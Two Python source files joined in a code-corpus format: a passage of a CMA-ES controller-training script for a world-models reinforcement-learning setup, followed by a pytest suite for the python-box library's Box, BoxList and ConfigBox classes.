Needs to be run using xvfb-run -s "-screen 0 1400x900x24"
"""
import argparse
import sys
import pickle
from os.path import join, exists, isfile
from os import mkdir, unlink, listdir, getpid
from time import sleep
from torch.multiprocessing import Process, Queue
import torch
import cma
from models import Controller
from tqdm import tqdm
import numpy as np
# from utils.misc import RolloutGenerator, ASIZE, RSIZE, LSIZE
# from utils.misc import load_parameters
# from utils.misc import flatten_parameters
from utils.explore_misc import RolloutGenerator, ASIZE, RSIZE, LSIZE
from utils.explore_misc import load_parameters
from utils.explore_misc import flatten_parameters
# parsing
parser = argparse.ArgumentParser()
parser.add_argument('--logdir', type=str, help='Where everything is stored.')
parser.add_argument('--n-samples', type=int, help='Number of samples used to obtain return estimate.',
default=4)
parser.add_argument('--pop-size', type=int, help='Population size.',
default=4)
parser.add_argument('--target-return', type=float, help='Stops once the return '
'gets above target_return', default=None)
parser.add_argument('--display', action='store_true', help="Use progress bars if "
"specified.")
parser.add_argument('--max-workers', type=int, help='Maximum number of workers.',
default=10)
parser.add_argument('--iteration', type=int, help='counter to keep track of where results are saved',
default=0)
parser.add_argument('--explore', action='store_true', help="If specified, use Reconstruction error and store models in exp.")
parser.add_argument('--max-epochs', type=int, help='Max epochs to train. Used instead of target-return to train explorer',
default=None)
args = parser.parse_args()
iteration = str(args.iteration)
# multiprocessing variables
n_samples = args.n_samples
pop_size = args.pop_size
num_workers = min(args.max_workers, n_samples * pop_size)
time_limit = 1000
folder_name = 'ctrl'
if args.explore:
folder_name = 'exp'
print('ctrl folder_name: ', folder_name)
# ??? what is this used for and does it matter that we delete it every time?
# create tmp dir if non existent and clean it if existent
tmp_dir = join(args.logdir, 'tmp')
if not exists(tmp_dir):
mkdir(tmp_dir)
else:
for fname in listdir(tmp_dir):
unlink(join(tmp_dir, fname))
# create ctrl dir if non exitent. Either is 'ctrl' or 'exp'
ctrl_dir = join(args.logdir, folder_name)
if not exists(ctrl_dir):
mkdir(ctrl_dir)
results_loc = args.logdir +'/controller_perf_target_'+str(folder_name)+'.pkl'
if not isfile(results_loc):
print(f'Iteration {iteration}, making new results file')
results={}
results['epoch'] = []
results['best'] = []
results['best_params'] = []
results['std_best'] = []
else:
print(f'Iteration {iteration}, loading results')
results = pickle.load( open( results_loc, "rb" ) )
################################################################################
# Thread routines #
################################################################################
def slave_routine(p_queue, r_queue, e_queue, p_index):
""" Thread routine.
Threads interact with p_queue, the parameters queue, r_queue, the result
queue and e_queue the end queue. They pull parameters from p_queue, execute
the corresponding rollout, then place the result in r_queue.
Each parameter has its own unique id. Parameters are pulled as tuples
(s_id, params) and results are pushed as (s_id, result). The same
parameter can appear multiple times in p_queue, displaying the same id
each time.
As soon as e_queue is non empty, the thread terminate.
When multiple gpus are involved, the assigned gpu is determined by the
process index p_index (gpu = p_index % n_gpus).
:args p_queue: queue containing couples (s_id, parameters) to evaluate
:args r_queue: where to place results (s_id, results)
:args e_queue: as soon as not empty, terminate
:args p_index: the process index
"""
# init routine
gpu = p_index % torch.cuda.device_count()
device = device="cuda:0" #torch.device('cuda:{}'.format(gpu) if torch.cuda.is_available() else 'cpu')
# redirect streams
# sys.stdout = open(join(tmp_dir, str(getpid()) + '.out'), 'a')
# sys.stderr = open(join(tmp_dir, str(getpid()) + '.err'), 'a')
with torch.no_grad():
r_gen = RolloutGenerator(args.logdir, device, time_limit, args.explore)
while e_queue.empty():
if p_queue.empty():
sleep(.1)
else:
s_id, params = p_queue.get()
r_queue.put((s_id, r_gen.rollout(params)))
################################################################################
# Define queues and start workers #
################################################################################
p_queue = Queue()
r_queue = Queue()
e_queue = Queue()
for p_index in range(num_workers):
Process(target=slave_routine, args=(p_queue, r_queue, e_queue, p_index)).start()
################################################################################
# Evaluation #
################################################################################
def evaluate(solutions, results, rollouts=100):
""" Give current controller evaluation.
Evaluation is minus the cumulated reward averaged over rollout runs.
:args solutions: CMA set of solutions
:args results: corresponding results
:args rollouts: number of rollouts
:returns: minus averaged cumulated reward
"""
index_min = np.argmin(results)
best_guess = solutions[index_min]
restimates = []
for s_id in range(rollouts):
p_queue.put((s_id, best_guess))
print("Evaluating...")
for _ in tqdm(range(rollouts)):
while r_queue.empty():
sleep(.1)
restimates.append(r_queue.get()[1])
return best_guess, np.mean(restimates), np.std(restimates)
################################################################################
# Launch CMA #
################################################################################
controller = Controller(LSIZE, RSIZE, ASIZE) # dummy instance
# define current best and load parameters
cur_best = None
ctrl_file = join(ctrl_dir, 'best.tar')
print("Attempting to load previous best...")
if exists(ctrl_file):
state = torch.load(ctrl_file, map_location={'cuda:0': 'cpu'})
cur_best = - state['reward']
controller.load_state_dict(state['state_dict'])
print("Previous best was {}...".format(-cur_best))
parameters = controller.parameters()
es = cma.CMAEvolutionStrategy(flatten_parameters(parameters), 0.1,
{'popsize': pop_size})
epoch = 0
log_step = 3
while not es.stop():
print('Starting epoch: ', epoch)
if args.target_return:
if cur_best is not None and - cur_best > args.target_return:
print("Already better than target, breaking...")
break
r_list = [0] * pop_size # result list
solutions = es.ask()
# push parameters to queue
for s_id, s in enumerate(solutions):
for _ in range(n_samples):
p_queue.put((s_id, s))
# retrieve results
if args.display:
pbar = tqdm(total=pop_size * n_samples)
for _ in range(pop_size * n_samples):
while r_queue.empty():
sleep(.1)
r_s_id, r = r_queue.get()
r_list[r_s_id] += r / n_samples
if args.display:
pbar.update(1)
if args.display:
pbar.close()
es.tell(solutions, r_list)
es.disp()
# evaluation and saving
if epoch % log_step == log_step - 1:
best_params, best, std_best = evaluate(solutions, r_list)
### ??? log the best
results['epoch'].extend([epoch])
results['best'].extend([best])
results['best_params'].extend([best_params])
results['std_best'].extend([std_best])
print(f"Epoch: {epoch}, Current evaluation best: {best}, std_best: {std_best}")
if not cur_best or cur_best > best:
cur_best = best
print("Saving new best with value {}+-{}...".format(-cur_best, std_best))
load_parameters(best_params, controller)
torch.save(
{'epoch': epoch,
'reward': - cur_best,
'state_dict': controller.state_dict()},
join(ctrl_dir, 'best.tar'))
# if args.max_epochs specified, stop base on this
if args.max_epochs:
if epoch > int(args.max_epochs):
print('MAX EPOCHS REACHED')
break
elif args.target_return:
if - best > args.target_return:
print('HIT TARGET RETURN')
print("Terminating controller training with value {}...".format(best))
break
epoch += 1
with open(results_loc, 'wb') as outfile:
pickle.dump(results, outfile, protocol=pickle.HIGHEST_PROTOCOL)
es.result_pretty()
e_queue.put('EOP')
|
test_functional_box.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Test files gathered from json.org and yaml.org
from __future__ import absolute_import
from multiprocessing import Process, Queue
import pytest
import pickle
try:
from test.common import *
except ImportError:
from .common import *
class TestBoxFunctional(unittest.TestCase):
@pytest.fixture(autouse=True)
def temp_dir_cleanup(self):
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except OSError:
pass
yield
shutil.rmtree(tmp_dir, ignore_errors=True)
def test_box(self):
bx = Box(**test_dict)
assert bx.key1 == test_dict['key1']
assert dict(getattr(bx, 'Key 2')) == test_dict['Key 2']
setattr(bx, 'TEST_KEY', 'VALUE')
assert bx.TEST_KEY == 'VALUE'
delattr(bx, 'TEST_KEY')
assert 'TEST_KEY' not in bx.to_dict(), bx.to_dict()
assert isinstance(bx['Key 2'].Key4, Box)
assert "'key1': 'value1'" in str(bx)
assert repr(bx).startswith("<Box:")
bx2 = Box([((3, 4), "A"), ("_box_config", 'test')])
assert bx2[(3, 4)] == "A"
assert bx2['_box_config'] == 'test'
bx3 = Box(a=4, conversion_box=False)
setattr(bx3, 'key', 2)
assert bx3.key == 2
bx3.__setattr__("Test", 3)
assert bx3.Test == 3
def test_box_modify_at_depth(self):
bx = Box(**test_dict)
assert 'key1' in bx
assert 'key2' not in bx
bx['Key 2'].new_thing = "test"
assert bx['Key 2'].new_thing == "test"
bx['Key 2'].new_thing += "2"
assert bx['Key 2'].new_thing == "test2"
assert bx['Key 2'].to_dict()['new_thing'] == "test2"
assert bx.to_dict()['Key 2']['new_thing'] == "test2"
bx.__setattr__('key1', 1)
assert bx['key1'] == 1
bx.__delattr__('key1')
assert 'key1' not in bx
def test_error_box(self):
bx = Box(**test_dict)
with pytest.raises(AttributeError):
getattr(bx, 'hello')
def test_box_from_dict(self):
ns = Box({"k1": "v1", "k2": {"k3": "v2"}})
assert ns.k2.k3 == "v2"
def test_box_from_bad_dict(self):
with pytest.raises(ValueError):
Box('{"k1": "v1", "k2": {"k3": "v2"}}')
def test_basic_box(self):
a = Box(one=1, two=2, three=3)
b = Box({'one': 1, 'two': 2, 'three': 3})
c = Box((zip(['one', 'two', 'three'], [1, 2, 3])))
d = Box(([('two', 2), ('one', 1), ('three', 3)]))
e = Box(({'three': 3, 'one': 1, 'two': 2}))
assert a == b == c == d == e
def test_config_box(self):
g = {"b0": 'no',
"b1": 'yes',
"b2": 'True',
"b3": 'false',
"b4": True,
"i0": '34',
"f0": '5.5',
"f1": '3.333',
"l0": '4,5,6,7,8',
"l1": '[2 3 4 5 6]'}
cns = ConfigBox(bb=g)
assert cns.bb.list("l1", spliter=" ") == ["2", "3", "4", "5", "6"]
assert cns.bb.list("l0", mod=lambda x: int(x)) == [4, 5, 6, 7, 8]
assert not cns.bb.bool("b0")
assert cns.bb.bool("b1")
assert cns.bb.bool("b2")
assert not cns.bb.bool("b3")
assert cns.bb.int("i0") == 34
assert cns.bb.float("f0") == 5.5
assert cns.bb.float("f1") == 3.333
assert cns.bb.getboolean("b4"), cns.bb.getboolean("b4")
assert cns.bb.getfloat("f0") == 5.5
assert cns.bb.getint("i0") == 34
assert cns.bb.getint("Hello!", 5) == 5
assert cns.bb.getfloat("Wooo", 4.4) == 4.4
assert cns.bb.getboolean("huh", True) is True
assert cns.bb.list("Waaaa", [1]) == [1]
assert repr(cns).startswith("<ConfigBox")
def test_protected_box_methods(self):
my_box = Box(a=3)
with pytest.raises(AttributeError):
my_box.to_dict = 'test'
with pytest.raises(AttributeError):
del my_box.to_json
def test_bad_args(self):
with pytest.raises(TypeError):
Box('123', '432')
def test_box_inits(self):
a = Box({'data': 2, 'count': 5})
b = Box(data=2, count=5)
c = Box({'data': 2, 'count': 1}, count=5)
d = Box([('data', 2), ('count', 5)])
e = Box({'a': [{'item': 3}, {'item': []}]})
assert e.a[1].item == []
assert a == b == c == d
def test_bad_inits(self):
with pytest.raises(ValueError):
Box("testing")
with pytest.raises(ValueError):
Box(22)
with pytest.raises(TypeError):
Box(22, 33)
def test_create_subdicts(self):
a = Box({'data': 2, 'count': 5})
a.brand_new = {'subdata': 1}
assert a.brand_new.subdata == 1
a.new_list = [{'sub_list_item': 1}]
assert a.new_list[0].sub_list_item == 1
assert isinstance(a.new_list, BoxList)
a.new_list2 = [[{'sub_list_item': 2}]]
assert a.new_list2[0][0].sub_list_item == 2
b = a.to_dict()
assert not isinstance(b['new_list'], BoxList)
def test_to_json(self):
a = Box(test_dict)
assert json.loads(a.to_json(indent=0)) == test_dict
a.to_json(tmp_json_file)
with open(tmp_json_file) as f:
data = json.load(f)
assert data == test_dict
def test_to_yaml(self):
a = Box(test_dict)
assert yaml.load(a.to_yaml(), Loader=yaml.SafeLoader) == test_dict
def test_to_yaml_file(self):
a = Box(test_dict)
a.to_yaml(tmp_yaml_file)
with open(tmp_yaml_file) as f:
data = yaml.load(f, Loader=yaml.SafeLoader)
assert data == test_dict
def test_boxlist(self):
new_list = BoxList({'item': x} for x in range(0, 10))
new_list.extend([{'item': 22}])
assert new_list[-1].item == 22
new_list.append([{'bad_item': 33}])
assert new_list[-1][0].bad_item == 33
assert repr(new_list).startswith("<BoxList:")
for x in new_list.to_list():
assert not isinstance(x, (BoxList, Box))
new_list.insert(0, {'test': 5})
new_list.insert(1, ['a', 'b'])
new_list.append('x')
assert new_list[0].test == 5
assert isinstance(str(new_list), str)
assert isinstance(new_list[1], BoxList)
assert not isinstance(new_list.to_list(), BoxList)
def test_dir(self):
a = Box(test_dict, camel_killer_box=True)
assert 'key1' in dir(a)
assert 'not$allowed' not in dir(a)
assert 'Key4' in a['Key 2']
for item in ('to_yaml', 'to_dict', 'to_json'):
assert item in dir(a)
assert a.big_camel == 'hi'
assert 'big_camel' in dir(a)
b = ConfigBox(test_dict)
for item in ('to_yaml', 'to_dict', 'to_json', 'int', 'list', 'float'):
assert item in dir(b)
def test_update(self):
a = Box(test_dict)
a.grand = 1000
a.update({'key1': {'new': 5}, 'Key 2': {"add_key": 6},
'lister': ['a']})
a.update([('asdf', 'fdsa')])
a.update(testkey=66)
a.update({'items': {'test': 'pme'}})
a.update({'key1': {'gg': 4}})
b = Box()
b.update(item=1)
assert a.grand == 1000
assert a['grand'] == 1000
assert isinstance(a['items'], Box)
assert a['items'].test == 'pme'
assert a.key1.new == 5
assert a['Key 2'].add_key == 6
assert isinstance(a.key1, Box)
assert isinstance(a.lister, BoxList)
assert a.asdf == 'fdsa'
assert a.testkey == 66
assert a.key1.new == 5 # On regular dict update this shouldn't happen
assert a.key1.gg == 4
c = Box(box_intact_types=[list])
c.a = [1, 2]
c.update({'b': [3, 4]})
assert c.a == [1, 2]
assert isinstance(c.b, list)
assert not isinstance(c.b, BoxList)
def test_auto_attr(self):
a = Box(test_dict, default_box=True)
assert a.a.a.a.a == Box()
a.b.b = 4
assert a.b.b == 4
def test_set_default(self):
a = Box(test_dict)
new = a.setdefault("key3", {'item': 2})
new_list = a.setdefault("lister", [{'gah': 7}])
assert a.setdefault("key1", False) == 'value1'
assert new == Box(item=2)
assert new_list == BoxList([{'gah': 7}])
assert a.key3.item == 2
assert a.lister[0].gah == 7
# default_box propagates after a setdefault and list object
a = Box(default_box=True)
a.b.c.setdefault('d', [])
a.b.c.d.append({})
a.b.c.d[0].e.f = 1
assert a.b.c.d[0].e.f == 1
# without default_box we would get an error
a = Box()
a.setdefault('b', [])
a.b.append({})
with self.assertRaises(BoxKeyError):
a.b[0].c.d = 1
a = Box()
a.setdefault('b', {})
with self.assertRaises(BoxKeyError):
a.b.c.d = 1
a = Box(default_box=True)
a.setdefault('b', {})
a.b.c.d.e.f = 1
assert a.b.c.d.e.f == 1
def test_from_json_file(self):
bx = Box.from_json(filename=data_json_file)
assert isinstance(bx, Box)
assert bx.widget.window.height == 500
def test_from_yaml_file(self):
bx = Box.from_yaml(filename=data_yaml_file)
assert isinstance(bx, Box)
assert bx.total == 4443.52
def test_from_json(self):
bx = Box.from_json(json.dumps(test_dict))
assert isinstance(bx, Box)
assert bx.key1 == 'value1'
def test_from_yaml(self):
bx = Box.from_yaml(yaml.dump(test_dict),
conversion_box=False,
default_box=True)
assert isinstance(bx, Box)
assert bx.key1 == 'value1'
assert bx.Key_2 == Box()
def test_bad_from_json(self):
with pytest.raises(BoxError) as err:
Box.from_json()
with pytest.raises(BoxError) as err2:
Box.from_json(json_string="[1]")
def test_bad_from_yaml(self):
with pytest.raises(BoxError) as err:
Box.from_yaml()
with pytest.raises(BoxError) as err2:
Box.from_yaml('lol')
def test_conversion_box(self):
bx = Box(extended_test_dict, conversion_box=True)
assert bx.Key_2.Key_3 == "Value 3"
assert bx.x3 == 'howdy'
assert bx.xnot == 'true'
assert bx.x3_4 == 'test'
with pytest.raises(AttributeError):
getattr(bx, "(3, 4)")
def test_frozen(self):
bx = Box(extended_test_dict, frozen_box=True)
assert isinstance(bx.alist, tuple)
assert bx.alist[0] == {'a': 1}
with pytest.raises(BoxError):
bx.new = 3
with pytest.raises(BoxError):
bx['new'] = 3
with pytest.raises(BoxError):
del bx['not']
with pytest.raises(BoxError):
delattr(bx, "key1")
with pytest.raises(TypeError):
hash(bx)
bx2 = Box(test_dict)
with pytest.raises(TypeError):
hash(bx2)
bx3 = Box(test_dict, frozen_box=True)
assert hash(bx3)
def test_hashing(self):
bx1 = Box(t=3, g=4, frozen_box=True)
bx2 = Box(g=4, t=3, frozen_box=True)
assert hash(bx1) == hash(bx2)
bl1 = BoxList([1, 2, 3, 4], frozen_box=True)
bl2 = BoxList([1, 2, 3, 4], frozen_box=True)
bl3 = BoxList([2, 1, 3, 4], frozen_box=True)
assert hash(bl2) == hash(bl1)
assert hash(bl3) != hash(bl2)
with pytest.raises(TypeError):
hash(BoxList([1, 2, 3]))
def test_frozen_list(self):
bl = BoxList([5, 4, 3], frozen_box=True)
with pytest.raises(BoxError):
bl.pop(1)
with pytest.raises(BoxError):
bl.remove(4)
with pytest.raises(BoxError):
bl.sort()
with pytest.raises(BoxError):
bl.reverse()
with pytest.raises(BoxError):
bl.append('test')
with pytest.raises(BoxError):
bl.extend([4])
with pytest.raises(BoxError):
del bl[0]
with pytest.raises(BoxError):
bl[0] = 5
bl2 = BoxList([5, 4, 3])
del bl2[0]
assert bl2[0] == 4
bl2[1] = 4
assert bl2[1] == 4
def test_config(self):
bx = Box(extended_test_dict)
assert bx['_box_config'] is True
assert isinstance(bx._box_config, dict)
with pytest.raises(BoxError):
delattr(bx, '_box_config')
bx._box_config
def test_default_box(self):
bx = Box(test_dict, default_box=True, default_box_attr={'hi': 'there'})
assert bx.key_88 == {'hi': 'there'}
bx2 = Box(test_dict, default_box=True, default_box_attr=Box)
assert isinstance(bx2.key_77, Box)
bx3 = Box(default_box=True, default_box_attr=3)
assert bx3.hello == 3
bx4 = Box(default_box=True, default_box_attr=ConfigBox)
assert isinstance(bx4.bbbbb, ConfigBox)
def test_camel_killer_box(self):
td = extended_test_dict.copy()
td['CamelCase'] = 'Item'
td['321CamelCaseFever!'] = 'Safe'
kill_box = Box(td, camel_killer_box=True, conversion_box=False)
assert kill_box.camel_case == 'Item'
assert kill_box['321CamelCaseFever!'] == 'Safe'
con_kill_box = Box(td, conversion_box=True, camel_killer_box=True)
assert con_kill_box.camel_case == 'Item'
assert con_kill_box.x321_camel_case_fever == 'Safe'
def test_default_and_camel_killer_box(self):
td = extended_test_dict.copy()
td['CamelCase'] = 'Item'
killer_default_box = Box(td, camel_killer_box=True, default_box=True)
assert killer_default_box.camel_case == 'Item'
assert killer_default_box.CamelCase == 'Item'
assert isinstance(killer_default_box.does_not_exist, Box)
assert isinstance(killer_default_box['does_not_exist'], Box)
def test_property_box(self):
td = test_dict.copy()
td['inner'] = {'CamelCase': 'Item'}
pbox = SBox(td, camel_killer_box=True)
assert isinstance(pbox.inner, SBox)
assert pbox.inner.camel_case == 'Item'
assert json.loads(pbox.json)['inner']['CamelCase'] == 'Item'
test_item = yaml.load(pbox.yaml, Loader=yaml.SafeLoader)
assert test_item['inner']['CamelCase'] == 'Item'
assert repr(pbox['inner']).startswith('<ShorthandBox')
assert not isinstance(pbox.dict, Box)
assert pbox.dict['inner']['CamelCase'] == 'Item'
def test_box_list_to_json(self):
bl = BoxList([{'item': 1, 'CamelBad': 2}])
assert json.loads(bl.to_json())[0]['item'] == 1
def test_box_list_from_json(self):
alist = [{'item': 1}, {'CamelBad': 2}]
json_list = json.dumps(alist)
bl = BoxList.from_json(json_list, camel_killer_box=True)
assert bl[0].item == 1
assert bl[1].camel_bad == 2
with pytest.raises(BoxError):
BoxList.from_json(json.dumps({'a': 2}))
def test_box_list_to_yaml(self):
bl = BoxList([{'item': 1, 'CamelBad': 2}])
assert yaml.load(bl.to_yaml(), Loader=yaml.SafeLoader)[0]['item'] == 1
def test_box_list_from_yaml(self):
alist = [{'item': 1}, {'CamelBad': 2}]
yaml_list = yaml.dump(alist)
bl = BoxList.from_yaml(yaml_list, camel_killer_box=True)
assert bl[0].item == 1
assert bl[1].camel_bad == 2
with pytest.raises(BoxError):
BoxList.from_yaml(yaml.dump({'a': 2}))
def test_boxlist_box_it_up(self):
bxl = BoxList([extended_test_dict])
bxl.box_it_up()
assert "Key 3" in bxl[0].Key_2._box_config['__converted']
def test_box_modify_tuples(self):
bx = Box(extended_test_dict, modify_tuples_box=True)
assert bx.tuples_galore[0].item == 3
assert isinstance(bx.tuples_galore[0], Box)
assert isinstance(bx.tuples_galore[1], tuple)
def test_box_set_attribs(self):
bx = Box(extended_test_dict, conversion_box=False,
camel_killer_box=True)
bx.camel_case = {'new': 'item'}
assert bx['CamelCase'] == Box(new='item')
bx2 = Box(extended_test_dict)
bx2.Key_2 = 4
assert bx2["Key 2"] == 4
def test_functional_hearthstone_data(self):
hearth = Box.from_json(filename=data_hearthstone,
conversion_box=True,
camel_killer_box=True,
default_box=False)
assert hearth.the_jade_lotus
with pytest.raises(AttributeError):
hearth._bad_value
with pytest.raises(AttributeError):
hearth.the_jade_lotus._bad_value
base_config = hearth._Box__box_config()
jade_config = hearth.the_jade_lotus._Box__box_config()
assert base_config == jade_config, "{} != {}".format(base_config,
jade_config)
def test_functional_spaceballs(self):
my_box = Box(movie_data)
my_box.movies.Spaceballs.Stars.append(
{"name": "Bill Pullman", "imdb": "nm0000597",
"role": "Lone Starr"})
assert my_box.movies.Spaceballs.Stars[-1].role == "Lone Starr"
assert my_box.movies.Robin_Hood_Men_in_Tights.length == 104
my_box.movies.Robin_Hood_Men_in_Tights.Stars.pop(0)
assert my_box.movies.Robin_Hood_Men_in_Tights.Stars[
0].name == "Richard Lewis"
def test_circular_references(self):
circular_dict = {}
circular_dict['a'] = circular_dict
bx = Box(circular_dict, box_it_up=True)
assert bx.a.a == bx.a
circular_dict_2 = bx.a.a.a.to_dict()
assert str(circular_dict_2) == "{'a': {...}}"
bx2 = Box(circular_dict, k=circular_dict)
assert bx2.k == bx2.a
with pytest.raises(ValueError):
bx.to_json()
circular_list = []
circular_list.append(circular_list)
bl = BoxList(circular_list)
assert bl == bl[0]
assert isinstance(bl[0], BoxList)
circular_list_2 = bl.to_list()
assert circular_list_2 == circular_list_2[0]
assert isinstance(circular_list_2, list)
def test_to_multiline(self):
a = BoxList([Box(a=1), Box(b=2), Box(three=5)])
a.to_json(tmp_json_file, multiline=True)
count = 0
with open(tmp_json_file) as f:
for line in f:
assert isinstance(json.loads(line), dict)
count += 1
assert count == 3
def test_from_multiline(self):
content = '{"a": 2}\n{"b": 3}\r\n \n'
with open(tmp_json_file, 'w') as f:
f.write(content)
a = BoxList.from_json(filename=tmp_json_file, multiline=True)
assert a[1].b == 3
def test_duplicate_errors(self):
with pytest.raises(BoxError) as err:
Box({"?a": 1, "!a": 3}, box_duplicates="error")
Box({"?a": 1, "!a": 3}, box_duplicates="ignore")
with pytest.warns(UserWarning) as warning:
Box({"?a": 1, "!a": 3}, box_duplicates="warn")
assert warning[0].message.args[0].startswith("Duplicate")
my_box = Box({"?a": 1}, box_duplicates="error")
with pytest.raises(BoxError):
my_box['^a'] = 3
def test_copy(self):
my_box = Box(movie_data, camel_killer_box=True)
my_box.aB = 1
bb = my_box.copy()
assert my_box == bb
assert isinstance(bb, Box)
aa = copy.deepcopy(my_box)
assert my_box == aa
assert my_box.a_b == 1
assert isinstance(aa, Box)
cc = my_box.__copy__()
assert my_box == cc
assert isinstance(cc, Box)
dd = BoxList([my_box])
assert dd == copy.copy(dd)
assert isinstance(copy.copy(dd), BoxList)
def test_deepcopy_of_frozen_box(self):
my_box = Box(data={'a': movie_data,
'b': Box(movie_data, frozen_box=True)},
frozen_box=True)
aa = copy.deepcopy(my_box)
assert my_box == aa
assert id(my_box) != id(aa)
assert isinstance(aa, Box)
def test_custom_key_errors(self):
my_box = Box()
with pytest.raises(BoxKeyError):
my_box.g
with pytest.raises(AttributeError):
my_box.g
with pytest.raises(KeyError):
my_box['g']
with pytest.raises(BoxKeyError):
my_box['g']
with pytest.raises(BoxError):
my_box['g']
def test_pickle(self):
pic_file = os.path.join(tmp_dir, 'test.p')
pic2_file = os.path.join(tmp_dir, 'test.p2')
bb = Box(movie_data, conversion_box=False)
with open(pic_file, 'wb') as pf:
pickle.dump(bb, pf)
with open(pic_file, 'rb') as pf:
loaded = pickle.load(pf)
assert bb == loaded
assert loaded._box_config['conversion_box'] is False
ll = [[Box({'a': 'b'}, ordered_box=True)], [[{'c': 'g'}]]]
bx = BoxList(ll)
with open(pic2_file, 'wb') as pf:
pickle.dump(bx, pf)
with open(pic2_file, 'rb') as pf:
loaded2 = pickle.load(pf)
assert bx == loaded2
loaded2.box_options = bx.box_options
def test_pickle_default_box(self):
bb = Box(default_box=True)
loaded = pickle.loads(pickle.dumps(bb))
assert bb == loaded
def test_conversion_dup_only(self):
with pytest.raises(BoxError):
Box(movie_data, conversion_box=False, box_duplicates='error')
def test_values(self):
b = Box()
b.foo = {}
assert isinstance(list(b.values())[0], Box)
c = Box()
c.foohoo = []
assert isinstance(list(c.values())[0], BoxList)
d = Box(movie_data)
assert len(movie_data["movies"].values()) == len(d.movies.values())
def test_items(self):
b = Box()
b.foo = {}
assert isinstance(list(b.items())[0][1], Box)
c = Box()
c.foohoo = []
assert isinstance(list(c.items())[0][1], BoxList)
d = Box(movie_data)
assert len(movie_data["movies"].items()) == len(d.movies.items())
def test_get(self):
bx = Box()
bx["c"] = {}
assert isinstance(bx.get("c"), Box)
assert isinstance(bx.get("b", {}), Box)
assert "a" in bx.get("a", Box(a=1, conversion_box=False))
assert isinstance(bx.get("a", [1, 2]), BoxList)
def test_get_default_box(self):
bx = Box(default_box=True)
assert bx.get('test', 4) == 4
assert isinstance(bx.get('a'), Box)
def test_is_in(self):
bx = Box()
dbx = Box(default_box=True)
assert "a" not in bx
assert "a" not in dbx
bx["b"] = 1
dbx["b"] = {}
assert "b" in bx
assert "b" in dbx
def test_through_queue(self):
my_box = Box(a=4, c={"d": 3})
queue = Queue()
queue.put(my_box)
p = Process(target=mp_queue_test, args=(queue,))
p.start()
p.join()
assert queue.get(timeout=1)
def test_update_with_integer(self):
bx = Box()
bx[1] = 4
assert bx[1] == 4
bx.update({1: 2})
assert bx[1] == 2
def test_get_box_config(self):
bx = Box()
bx_config = bx.__getattr__('_box_config')
assert bx_config
with pytest.raises(BoxKeyError):
bx['_box_config']
def test_ordered_box(self):
bx = Box(h=1, ordered_box=True)
bx.a = 1
bx.c = 4
bx['g'] = 7
bx.d = 2
assert bx.keys() == ['h', 'a', 'c', 'g', 'd']
assert list(bx.__iter__()) == ['h', 'a', 'c', 'g', 'd']
assert list(reversed(bx)) == ['d', 'g', 'c', 'a', 'h']
del bx.a
bx.pop('c')
bx.__delattr__('g')
assert bx.keys() == ['h', 'd']
def test_intact_types_dict(self):
from collections import OrderedDict
bx = Box(a=OrderedDict([('y', 1), ('x', 2)]))
assert isinstance(bx.a, Box)
assert not isinstance(bx.a, OrderedDict)
bx = Box(a=OrderedDict([('y', 1), ('x', 2)]),
box_intact_types=[OrderedDict])
assert isinstance(bx.a, OrderedDict)
assert not isinstance(bx.a, Box)
def test_intact_types_list(self):
class MyList(list):
pass
bl = BoxList([[1, 2], MyList([3, 4])], box_intact_types=(MyList,))
assert isinstance(bl[0], BoxList)
def test_pop(self):
bx = Box(a=4, c={"d": 3}, b={"h": {"y": 2}})
assert bx.pop('a') == 4
assert bx.pop('b').h.y == 2
with pytest.raises(BoxKeyError):
bx.pop('b')
assert bx.pop('a', None) is None
assert bx.pop('a', True) is True
assert bx == {'c': {"d": 3}}
with pytest.raises(BoxError):
bx.pop(1, 2, 3)
assert bx.pop('c', True) is not True
def test_pop_items(self):
bx = Box(a=4)
assert bx.popitem() == ('a', 4)
with pytest.raises(BoxKeyError):
assert bx.popitem()
def test_iter(self):
bx = Box(ordered_box=True)
bx.a = 1
bx.c = 2
assert list(bx.__iter__()) == ['a', 'c']
def test_revered(self):
bx = Box(ordered_box=True)
bx.a = 1
bx.c = 2
assert list(reversed(bx)) == ['c', 'a']
def test_clear(self):
bx = Box(ordered_box=True)
bx.a = 1
bx.c = 4
bx['g'] = 7
bx.d = 2
assert bx.keys() == ['a', 'c', 'g', 'd']
bx.clear()
assert bx == {}
assert bx.keys() == []
def test_bad_recursive(self):
b = Box()
bl = b.setdefault("l", [])
bl.append(["foo"])
assert bl == [['foo']], bl
def test_inheritance_copy(self):
class Box2(Box):
pass
class SBox2(SBox):
pass
class ConfigBox2(ConfigBox):
pass
b = Box2(a=1)
c = b.copy()
assert c == b
assert isinstance(c, Box)
c = b.__copy__()
assert c == b
assert isinstance(c, Box)
d = SBox2(a=1)
e = d.copy()
assert e == d
assert isinstance(e, SBox)
e = d.__copy__()
assert e == d
assert isinstance(e, SBox)
f = ConfigBox2(a=1)
g = f.copy()
assert g == f
assert isinstance(g, ConfigBox)
g = f.__copy__()
assert g == f
assert isinstance(g, ConfigBox)
class TestBoxObject:
@pytest.mark.parametrize('wrapped', python_example_objects)
def test_box_object_generic(self, wrapped):
b = BoxObject(wrapped)
assert b == wrapped
assert not (b is wrapped)
assert isinstance(b, BoxObject)
assert isinstance(b, type(wrapped))
b.box_key = 'secret_word'
assert b.box_key == 'secret_word'
assert 'box_key' in b.__dict__
assert isinstance(b.__dict__, Box)
assert b.__dict__ != getattr(b.__wrapped__, '__dict__', None)
with pytest.raises(AttributeError):
b.foo
if hasattr(b.__wrapped__, 'b'):
b.b = 1
assert b.__wrapped__.b == 1
@pytest.mark.parametrize('wrapped', python_example_objects)
def test_box_object_deletion(self, wrapped):
b = BoxObject(wrapped)
with pytest.raises(TypeError):
b.__dict__ = 0
del b.__dict__
assert b.__dict__ == getattr(b.__wrapped__, '__dict__', {})
with pytest.raises(AttributeError):
del b.foo
if hasattr(b.__wrapped__, 'a'):
del b.a
if not hasattr(b.__wrapped__, 'b'):
with pytest.raises(AttributeError):
del b.b
def test_box_object_attributes(self):
b = BoxObject(test_dict, **movie_data)
assert b == test_dict
assert not (b is test_dict)
assert b.__dict__ == movie_data
assert isinstance(b.__dict__, Box)
assert b.__dict__ != getattr(b.__wrapped__, '__dict__', None)
for k, v in movie_data.items():
assert getattr(b, k) == v
tagged = k + '_b'
setattr(b, tagged, [v])
assert getattr(b, tagged) == [v]
setattr(b, k, getattr(b, tagged))
assert getattr(b, k) == [v]
for k, v in test_dict.items():
assert k in b
